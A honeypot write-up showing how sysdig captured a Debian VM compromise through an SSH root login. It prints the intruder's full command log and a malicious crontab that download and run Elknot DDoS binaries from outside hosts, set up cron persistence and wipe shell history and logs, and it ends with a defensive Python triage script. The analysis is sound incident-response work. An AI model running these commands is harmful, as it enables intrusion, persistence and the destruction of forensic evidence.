
<h1>Honeypot test</h1>
<p>Published 2014-05-18, last modified 2017-02-16. Original: <a href="https://futex.re/blog/?p=163">https://futex.re/blog/?p=163</a></p>
<p>I recently heard of a new system tracing tool, <a href="http://www.sysdig.org" title="sysdig">sysdig</a>.<br />
It looks very complete: it gives you roughly what strace, tcpdump and lsof do, but from a single capture of the whole system that you can replay and filter afterwards.</p>
<p>I wanted to try it on a honeypot.</p>
<p>So I installed a virtual machine with my favourite OS, Debian 7.5 🙂</p>
<p>Installing sysdig is very easy, just one command:</p>
<p><img decoding="async" src="https://futex.re/blog/wp-content/uploads/2014/05/sysdig_install.jpg" alt="sysdig_install" /></p>
<p>Set a trivial root password such as &#8220;toor&#8221; as bait, and start logging with this command:</p>
<pre><code>nohup sysdig -s 4096 -z -w /var/log/.syslog/$(hostname).scap.gz &</code></pre>
<p><code>-s 4096</code> raises the per-event snapshot length from the default 80 bytes to 4 KiB, so the contents of I/O buffers (command lines, downloaded data) are kept; <code>-z</code> compresses the capture and <code>-w</code> writes it to a file; <code>nohup ... &</code> keeps it running after the shell that started it is closed. The capture runs as root on the box itself, so a careful intruder could find and kill it. In this case the attacker&#8217;s script killed syslogd but never touched sysdig.</p>
<p>I use /var/log/.syslog to hide the directory 🙂</p>
<p>And wait for an attack! 😀</p>
<p>After 4 hours, my VM was pwned.</p>
<p>Netstat<br />
<img decoding="async" src="https://futex.re/blog/wp-content/uploads/2014/05/top_net.jpg" alt="netstat" /></p>
<p>ps<br />
<img decoding="async" src="https://futex.re/blog/wp-content/uploads/2014/05/ps.jpg" alt="ps" /></p>
<p>topnet<br />
<img decoding="async" src="https://futex.re/blog/wp-content/uploads/2014/05/top_net.jpg" alt="topnet" /></p>
<p>topconnect<br />
<img decoding="async" src="https://futex.re/blog/wp-content/uploads/2014/05/top_connect.jpg" alt="topconnect" /></p>
<p>Take a look at the commands the bad guy ran. Everything below comes straight from the capture, one line per process in <code>time user)command</code> form. The intruder logged in as root over SSH (the first thing we see is an sftp-server subsystem being spawned), and the burst of dozens of commands per second from 17:12:48 onwards is clearly a script, not someone typing:</p>
<pre><code>17:11:55 root)/usr/lib/openssh/sftp-server
17:12:48 root)chmod 7777 / etc
17:12:48 root)killall -9 .IptabLes
17:12:48 root)killall -9 nfsd4
17:12:48 root)killall -9 profild.key
17:12:48 root)cd /etc
17:12:48 root)rm -rf dir fake.cfg
17:12:48 root)killall -9 nfsd
17:12:48 root)killall -9 DDosl
17:12:48 root)killall -9 lengchao32
17:12:48 root)killall -9 b26
17:12:48 root)killall -9 Bill
17:12:48 root)killall -9 n26
17:12:48 root)killall -9 1
17:12:48 root)killall -9 codelove
17:12:48 root)killall -9 32
17:12:48 root)killall -9 m32
17:12:48 root)killall -9 m64
17:12:48 root)killall -9 64
17:12:48 root)killall -9 83BOT
17:12:48 root)killall -9 node24
17:12:48 root)killall -9 mimi
17:12:48 root)killall -9 nodeJR-1
17:12:48 root)killall -9 freeBSD
17:12:48 root)killall -9 ksapdd
17:12:48 root)killall -9 kysapdd
17:12:48 root)killall -9 sksapdd
17:12:48 root)killall -9 xsw
17:12:48 root)killall -9 syslogd
17:12:48 root)killall -9 skysapdd
17:12:48 root)killall -9 cupsddd
17:12:48 root)killall -9 ksapd
17:12:48 root)killall -9 atddd
17:12:48 root)killall -9 xfsdxd
17:12:48 root)killall -9 sfewfesfs
17:12:48 root)cd /root
17:12:48 root)chmod 7777 / etc
17:12:48 root)killall -9 minerd
17:12:48 root)killall -9 0
17:12:48 root)killall -9 joudckfr
17:12:48 root)killall -9 www
17:12:48 root)killall -9 log
17:12:48 root)killall -9 .IptabLex
17:12:48 root)killall -9 .Mm2
17:12:48 root)killall -9 acpid
17:12:48 root)killall -9 m64
17:12:48 root)killall -9 ./QQ
17:12:48 root)killall -9 QQ
17:12:48 root)killall -9 g3
17:12:48 root)killall -9 2
17:12:48 root)killall -9 3
17:12:48 root)killall -9 pm
17:12:48 root)killall -9 qweasd
17:12:48 root)killall -9 tangtang
17:12:48 root)killall -9 imap-login
17:12:48 root)killall -9 xudp
17:12:48 root)killall -9 txma
17:12:48 root)killall -9 mrdos64.b00
17:12:48 root)killall -9 mrdos32.b00
17:12:49 root)rm -rf dir kysapdd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir sksapdd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir skysapdd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir xfsdxd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir fake.cfg
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir cupsdd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir atdd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir ksapd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir kysapd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir sksapd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir skysapd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir xfsdx.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir sfewfesfs
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir gfhjrtfyhuf
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir rewgtf3er4t
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir sdmfdsfhjfe
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir gfhddsfew
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir ferwfrre
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir dsfrefr
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir sfewfesfs.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir gfhjrtfyhuf.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir rewgtf3er4t.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir sdmfdsfhjfe.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir gfhddsfew.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir ferwfrre.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir dsfrefr.*
17:12:49 root)cd /tmp
17:12:49 root)rm -rf dir 1.*
17:12:49 root)cd /tmp
17:12:49 root)rm -rf dir 2.*
17:12:49 root)cd /tmp
17:12:49 root)rm -rf dir 3.*
17:12:49 root)cd /tmp
17:12:49 root)rm -rf dir 4.*
17:12:49 root)cd /tmp
17:12:49 root)rm -rf dir 5.*
17:12:49 root)cd /var/spool/cron
17:12:49 root)rm -rf dir root.*
17:12:49 root)cd /var/spool/cron
17:12:49 root)rm -rf dir root
17:12:49 root)cd /var/spool/cron/crontabs
17:12:49 root)rm -rf dir root.*
17:12:49 root)cd /var/spool/cron/crontabs
17:12:49 root)rm -rf dir root
17:12:49 root)cd /var/spool/cron
17:12:49 root)wget http://122.224.34.75:8188/root
17:12:52 root)cd /var/spool/cron/crontabs
17:12:52 root)wget http://122.224.34.75:8188/root
17:12:54 root)cd /etc
17:12:54 root)wget http://122.224.34.75:8188/sfewfesfs
17:13:02 root)cd /etc
17:13:02 root)wget http://122.224.34.75:8188/gfhjrtfyhuf
17:13:12 root)cd /etc
17:13:12 root)wget http://122.224.34.75:8188/rewgtf3er4t
17:13:16 root)cd /etc
17:13:16 root)wget http://122.224.34.75:8188/sdmfdsfhjfe
17:13:22 root)cd /etc
17:13:22 root)wget http://122.224.34.75:8188/gfhddsfew
17:13:30 root)cd /etc
17:13:30 root)wget http://122.224.34.75:8188/ferwfrre
17:13:35 root)cd /etc
17:13:35 root)wget http://122.224.34.75:8188/dsfrefr
17:13:41 root)cd /etc
17:13:41 root)chmod 7777 sfewfesfs
17:13:41 root)cd /etc
17:13:41 root)chmod 7777 gfhjrtfyhuf
17:13:41 root)cd /etc
17:13:41 root)chmod 7777 rewgtf3er4t
17:13:41 root)cd /etc
17:13:41 root)chmod 7777 sdmfdsfhjfe
17:13:41 root)cd /etc
17:13:41 root)chmod 7777 gfhddsfew
17:13:41 root)cd /etc
17:13:41 root)chmod 7777 ferwfrre
17:13:41 root)cd /etc
17:13:41 root)chmod 7777 dsfrefr
17:13:41 root)cd /etc
17:13:41 root)chattr +i sfewfesfs
17:13:41 root)nohup /etc/ferwfrre
17:13:41 root)nohup /etc/ferwfrre
17:13:41 root)nohup /etc/gfhddsfew
17:13:41 root)nohup /etc/gfhddsfew
17:13:41 root)nohup /etc/sdmfdsfhjfe
17:13:41 root)nohup /etc/sdmfdsfhjfe
17:13:41 root)nohup /etc/rewgtf3er4t
17:13:41 root)nohup /etc/rewgtf3er4t
17:13:41 root)nohup /etc/dsfrefr
17:13:41 root)nohup /etc/dsfrefr
17:13:41 root)rm -rf /root/.bash_history
17:13:41 root)nohup /etc/gfhjrtfyhuf
17:13:41 root)nohup /etc/gfhjrtfyhuf
17:13:41 root)touch /root/.bash_history
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /root
17:13:41 root)sleep 600
17:13:43 root)basename /usr/sbin/service
17:13:43 root)basename /usr/sbin/service
17:13:43 root)cd /
17:13:43 root)basename /usr/sbin/service
17:13:43 root)basename /usr/sbin/service
17:13:43 root)cd /
17:13:43 root)run-parts --lsbsysinit --list /lib/lsb/init-functions.d
17:13:43 root)grep -q permission
17:13:43 root)/sbin/ebtables -t filter -L
17:13:43 root)/sbin/ebtables -t filter -L
17:13:43 root)/sbin/ebtables -t nat -L
17:13:43 root)/sbin/ebtables -t broute -L
17:13:43 root)/bin/echo -n Clearing ebtables rulesets:
17:13:43 root)/bin/echo -n  filter
17:13:43 root)/sbin/ebtables -t filter --init-table
17:13:43 root)/bin/echo -n  nat
17:13:43 root)/sbin/ebtables -t nat --init-table
17:13:43 root)/bin/echo -n  broute
17:13:43 root)/sbin/ebtables -t broute --init-table
17:13:43 root)cut -d  -f1
17:13:43 root)grep -E ^(ebt|ebtable)_ /proc/modules
17:13:43 root)rmmod ebtable_broute
17:13:43 root)rmmod ebtable_filter
17:13:43 root)rmmod ebtable_nat
17:13:43 root)rmmod ebtables
17:13:43 root)/bin/echo -n  done
17:13:43 root)run-parts --lsbsysinit --list /lib/lsb/init-functions.d
17:13:43 root)grep -q permission
17:13:43 root)/sbin/ebtables -t filter -L
17:13:43 root)/sbin/ebtables -t filter -L
17:13:43 root)/sbin/ebtables -t nat -L
17:13:43 root)/sbin/ebtables -t broute -L
17:13:43 root)/bin/echo -n Clearing ebtables rulesets:
17:13:43 root)/bin/echo -n  filter
17:13:43 root)/sbin/ebtables -t filter --init-table
17:13:43 root)/bin/echo -n  nat
17:13:43 root)/sbin/ebtables -t nat --init-table
17:13:43 root)/bin/echo -n  broute
17:13:43 root)/sbin/ebtables -t broute --init-table
17:13:43 root)cut -d  -f1
17:13:43 root)grep -E ^(ebt|ebtable)_ /proc/modules
17:13:43 root)rmmod ebtable_broute
17:13:43 root)rmmod ebtable_nat
17:13:43 root)rmmod ebtable_filter
17:13:43 root)rmmod ebtables
17:13:43 root)/bin/echo -n  done
17:13:55 root)basename /usr/sbin/service
17:13:55 root)basename /usr/sbin/service
17:13:55 root)cd /
17:13:55 root)setsid /etc/.SSH2
17:13:55 root)setsid /etc/.SSH2
17:13:55 root)setsid /etc/.SSH2
17:13:55 root)setsid /etc/.SSH2
17:17:01 root)cd /
17:17:01 root)run-parts --report /etc/cron.hourly
17:21:29 root)ps -ef
17:21:34 root)ps -ef
17:22:14 root)ps -ef</code></pre>
<p>A few things worth noticing in there. The script first kills a long list of process names, which are other people&#8217;s bots and miners (plus <code>syslogd</code>), so this is as much about evicting competitors as about hiding. <code>rm -rf dir X</code> simply removes <code>X</code> (there is no <code>dir</code>), and <code>chmod 7777 / etc</code> puts setuid, setgid, sticky and world-writable permissions on <code>/</code>, probably a typo for <code>/etc</code>. <code>chattr +i sfewfesfs</code> makes that file immutable, so a cleanup has to run <code>chattr -i</code> before <code>rm</code> will work. The ebtables block looks like Debian&#8217;s ebtables init script being stopped through <code>service</code>, twice. The <code>cd /</code> and <code>run-parts --report /etc/cron.hourly</code> at 17:17:01 is just Debian&#8217;s normal hourly cron job, and the three <code>ps -ef</code> at the end, spaced seconds apart, look like the attacker coming back to check by hand.</p>
<p>He downloaded 8 files: 7 binaries plus a file named <code>root</code>, all from the same host and port.</p>
<pre><code>17:12:49 root)wget http://122.224.34.75:8188/root
17:12:54 root)wget http://122.224.34.75:8188/sfewfesfs
17:13:02 root)wget http://122.224.34.75:8188/gfhjrtfyhuf
17:13:12 root)wget http://122.224.34.75:8188/rewgtf3er4t
17:13:16 root)wget http://122.224.34.75:8188/sdmfdsfhjfe
17:13:22 root)wget http://122.224.34.75:8188/gfhddsfew
17:13:30 root)wget http://122.224.34.75:8188/ferwfrre
17:13:35 root)wget http://122.224.34.75:8188/dsfrefr</code></pre>
<p>And we find one more binary in /etc/.SSH2.</p>
<pre><code>MD5: 3f5c73745f7c17702bac0642a85d7d80  sha1: 34261024f4dfa63a16055230a325e8767cfef253  dsfrefr
MD5: a89c089b8d020034392536d66851b939  sha1: a1bfe161d49b50d62796618c768f4d06dcfe7d5f  ferwfrre
MD5: 9401f208a419fb636520ea2aefc8bbd7  sha1: b66a0d68d3f8236b312a0434e504788f1a2f383c  gfhddsfew
MD5: e7c2f99b30daf8d99f6b5911d25fd8c7  sha1: 06957097fe51829b4c7e8009cd3dce5ba565e920  gfhjrtfyhuf
MD5: dc893d16316489dffa4e8d86040189b2  sha1: 931077c1b93c387e87b29e2b206aff5e5e58c223  rewgtf3er4t
MD5: 5d10bcb15bedb4b94092c4c2e4d245b6  sha1: 6eba031ec658aeb82aed5b94c4ba829da38553f4  sdmfdsfhjfe
MD5: f9ad37bc11a4f5249b660cacadd14ad3  sha1: e41a40fdcd94718eef8a954ce67bd03ac5c70a00  sfewfesfs
MD5: dc893d16316489dffa4e8d86040189b2  sha1: 931077c1b93c387e87b29e2b206aff5e5e58c223  SSH2</code></pre>
<p>Two of the binaries are UPX-packed; sums of the unpacked files:</p>
<pre><code>MD5: 1da702a39ad4bc15c5a1e51422f4cd69  sha1: 529f5beda846688f43c748e3b78fd947aa6bf662  rewgtf3er4t
MD5: f9ad37bc11a4f5249b660cacadd14ad3  sha1: e41a40fdcd94718eef8a954ce67bd03ac5c70a00  sfewfesfs</code></pre>
<p>rewgtf3er4t has the same sums as SSH2, so it is the same binary; presumably when rewgtf3er4t is launched it copies itself to /etc/.SSH2, which is what the capture shows being started with <code>setsid</code> at 17:13:55.</p>
<p>VirusTotal analysis:</p>
<p><a href="https://www.virustotal.com/en/file/682e7668b3e9314681b1b70ac3c4d2a5a890fc966c59d9d36851acee61398438/analysis/" title="dsfrefr">dsfrefr</a><br />
<a href="https://www.virustotal.com/en/file/cc66cd0ab86567dc920761b3f7711a13817a2d06fb49e5dc9123065dcaceb0fc/analysis/" title="ferwfrre">ferwfrre</a><br />
<a href="https://www.virustotal.com/en/file/054a88f45df8c2cd232c1193a13f606d39884853eef08547cc85b21d58c93bd4/analysis/" title="gfhddsfew">gfhddsfew</a><br />
<a href="https://www.virustotal.com/en/file/994c6a202d7d4d82520c5bb7c3f719a39e6ce5bf9d89add804105858bb2aff96/analysis/" title="gfhjrtfyhuf">gfhjrtfyhuf</a><br />
<a href="https://www.virustotal.com/en/file/29f89dc1da6da3fa2fa951c3453d63ff82eab3159020012a90763df279a75e25/analysis/" title="rewgtf3er4t">rewgtf3er4t</a><br />
<a href="https://www.virustotal.com/en/file/aadb2c3df170432943581c4c79665e614cc4802526c3184aca2da1aac62d72d1/analysis/" title="sdmfdsfhjfe">sdmfdsfhjfe</a><br />
<a href="https://www.virustotal.com/en/file/50e3c0c9f6827aa3b6a8922e7b5d892fe69cb542af4d5c0f745f6ea92afe3f02/analysis/" title="sfewfesfs">sfewfesfs</a><br />
<a href="https://www.virustotal.com/en/file/29f89dc1da6da3fa2fa951c3453d63ff82eab3159020012a90763df279a75e25/analysis/" title="SSH2">SSH2</a></p>
<p>The <code>root</code> file is meant to be installed as root&#8217;s crontab. The script fetched it into both /var/spool/cron (the Red Hat layout) and /var/spool/cron/crontabs (the Debian one), so the same installer is written to work on either family.</p>
<pre><code>#more root  | grep -v ^#
*/1 * * * * killall -9 .IptabLes
*/1 * * * * killall -9 nfsd4
*/1 * * * * killall -9 profild.key
*/1 * * * * killall -9 nfsd
*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 lengchao32
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 freeBSD
*/99 * * * * killall -9 sdmfdsfhjfe
*/98 * * * * killall -9 gfhjrtfyhuf
*/97 * * * * killall -9 sdmfdsfhjfe
*/96 * * * * killall -9 rewgtf3er4t
*/95 * * * * killall -9 ferwfrre
*/94 * * * * killall -9 dsfrefr
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhjrtfyhuf
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sfewfesfs
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sdmfdsfhjfe
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhddsfew
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/rewgtf3er4t
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ferwfrre
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/dsfrefr
*/120 * * * * cd /root;rm -rf dir nohup.out
*/360 * * * * cd /etc;rm -rf dir gfhjrtfyhuf
*/360 * * * * cd /etc;rm -rf dir dsfrefr
*/360 * * * * cd /etc;rm -rf dir sdmfdsfhjfe
*/360 * * * * cd /etc;rm -rf dir rewgtf3er4t
*/360 * * * * cd /etc;rm -rf dir gfhddsfew
*/360 * * * * cd /etc;rm -rf dir ferwfrre
*/1 * * * * cd /etc;rm -rf dir sfewfesfs.*
*/1 * * * * cd /etc;rm -rf dir gfhjrtfyhuf.*
*/1 * * * * cd /etc;rm -rf dir dsfrefr.*
*/1 * * * * cd /etc;rm -rf dir sdmfdsfhjfe.*
*/1 * * * * cd /etc;rm -rf dir rewgtf3er4t.*
*/1 * * * * cd /etc;rm -rf dir gfhddsfew.*
*/1 * * * * cd /etc;rm -rf dir ferwfrre.*
*/1 * * * * chmod 7777 /etc/gfhjrtfyhuf
*/1 * * * * chmod 7777 /etc/sfewfesfs
*/1 * * * * chmod 7777 /etc/dsfrefr
*/1 * * * * chmod 7777 /etc/sdmfdsfhjfe
*/1 * * * * chmod 7777 /etc/rewgtf3er4t
*/1 * * * * chmod 7777 /etc/gfhddsfew
*/1 * * * * chmod 7777 /etc/ferwfrre
*/99 * * * * nohup /etc/sfewfesfs > /dev/null 2>&1&
*/100 * * * * nohup /etc/sdmfdsfhjfe > /dev/null 2>&1&
*/99 * * * * nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
*/98 * * * * nohup /etc/sdmfdsfhjfe > /dev/null 2>&1&
*/97 * * * * nohup /etc/rewgtf3er4t > /dev/null 2>&1&
*/96 * * * * nohup /etc/ferwfrre > /dev/null 2>&1&
*/95 * * * * nohup /etc/dsfrefr > /dev/null 2>&1&
*/1 * * * * echo "unset MAILCHECK" >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * touch /root/.bash_history
*/1 * * * * history -r
*/1 * * * * cd /var/log > dmesg
*/1 * * * * cd /var/log > auth.log
*/1 * * * * cd /var/log > alternatives.log
*/1 * * * * cd /var/log > boot.log
*/1 * * * * cd /var/log > btmp
*/1 * * * * cd /var/log > cron
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
*/1 * * * * history -c</code></pre>
<p>The crontab re-downloads and restarts the binaries from a second distribution point, www.dgnfd564sdf.com:8080, so there are two download sources to block, not one. Its log wiping is less effective than it looks: in <code>cd /var/log > dmesg</code> the shell opens the redirection target before it runs <code>cd</code>, relative to the job&#8217;s working directory (root&#8217;s home for a root crontab), so these entries only create empty files in /root and leave /var/log alone. Only <code>cd /root > .bash_history</code> hits its intended target, and only by accident. The same sequence of commands shows up in the capture at 17:13:41 as the run of <code>cd /var/log</code> lines.</p>
<p>All the binaries are known DDoS tools from the Elknot trojan family; if I have a little more time later, I will try to reverse them.</p>
<p>Reference: <a href="http://draios.com/fishing-for-hackers/" title="draios.com">draios.com</a></p>
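<p>Added example, not code from the original post: a small Python triage script for the kind of <code>time user)command</code> listing shown above. It labels each command by tactic, pulls out the download URLs and the hosts they point at, lists the dropped files started in the background, and works out which file a cron entry such as <code>cd /var/log > dmesg</code> really truncates. The embedded sample is a constructed subset of the captured lines; the tactic names and regexes are my own choices, not anything from sysdig or the post.</p>

```python
"""Triage of sysdig "time user)command" output from a honeypot.

Added example, not code from the original post. SAMPLE_LOG is a constructed
subset of the commands in the capture; the labels and rules are my own.
"""
import posixpath
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample: a subset of the captured lines, same layout as the post.
SAMPLE_LOG = """\
17:11:55 root)/usr/lib/openssh/sftp-server
17:12:48 root)chmod 7777 / etc
17:12:48 root)killall -9 syslogd
17:12:48 root)killall -9 minerd
17:12:49 root)cd /var/spool/cron
17:12:49 root)wget http://122.224.34.75:8188/root
17:12:54 root)wget http://122.224.34.75:8188/sfewfesfs
17:13:41 root)chmod 7777 sfewfesfs
17:13:41 root)chattr +i sfewfesfs
17:13:41 root)nohup /etc/ferwfrre
17:13:41 root)rm -rf /root/.bash_history
17:13:41 root)touch /root/.bash_history
17:13:55 root)setsid /etc/.SSH2
17:21:29 root)ps -ef
"""

LINE_RE = re.compile(r"^(\d\d:\d\d:\d\d) (\S+?)\)(.*)$")

# Ordered: the first regex that matches decides the label, so the specific
# "kill-logger" rule has to sit before the generic "kill-competitor" one.
RULES = [
    ("download",         re.compile(r"^(wget|curl)\s")),
    ("cron-persistence", re.compile(r"^cd /var/spool/cron")),
    ("immutable-file",   re.compile(r"^chattr \+i\s")),
    ("setuid-perms",     re.compile(r"^chmod 7777\s")),
    ("kill-logger",      re.compile(r"^killall -9 (r?syslogd|auditd)$")),
    ("kill-competitor",  re.compile(r"^killall -9 ")),
    ("history-wipe",     re.compile(r"\.bash_history(\s|$)")),
    ("detach-exec",      re.compile(r"^(nohup|setsid) /")),
]


def parse_log(text):
    """Turn 'HH:MM:SS user)command' lines into (time, user, command) tuples."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append((m.group(1), m.group(2), m.group(3).strip()))
    return events


def classify(command):
    """First matching tactic label, or None for commands no rule covers."""
    for label, rx in RULES:
        if rx.search(command):
            return label
    return None


def triage(text):
    """Commands per tactic, download URLs and hosts, and dropped files run."""
    tactics = defaultdict(list)
    urls, dropped = [], []
    for _time, _user, cmd in parse_log(text):
        label = classify(cmd)
        if label is None:
            continue
        tactics[label].append(cmd)
        if label == "download":
            urls.extend(tok for tok in cmd.split()[1:] if "://" in tok)
        elif label == "detach-exec":
            dropped.append(cmd.split()[1])
    return {
        "tactics": dict(tactics),
        "urls": urls,
        "hosts": sorted({urlparse(u).netloc for u in urls}),
        "dropped": dropped,
    }


REDIRECT_RE = re.compile(r">>?\s*(\S+)")


def redirect_target(cwd, command):
    """Path the first output redirection in `command` actually opens.

    The shell opens the target relative to the working directory *before*
    running the command, so 'cd /var/log > dmesg' from cron (which starts
    jobs in the user's home) truncates /root/dmesg, not /var/log/dmesg.
    """
    m = REDIRECT_RE.search(command)
    if not m:
        return None
    target = m.group(1)
    return target if target.startswith("/") else posixpath.join(cwd, target)


if __name__ == "__main__":
    summary = triage(SAMPLE_LOG)
    for label, cmds in summary["tactics"].items():
        print(f"{label:17} {len(cmds)}x  e.g. {cmds[0]}")
    print("hosts:", summary["hosts"], "dropped:", summary["dropped"])
    print("'cd /var/log > dmesg' from /root truncates",
          redirect_target("/root", "cd /var/log > dmesg"))
```

<p>Run it as a script to see the summary, or feed <code>triage()</code> the full listing from a real capture. Unmatched commands (the sftp-server start, <code>ps -ef</code>) are deliberately left out of the summary rather than guessed at, so a new rule has to be added for each tactic you want counted.</p>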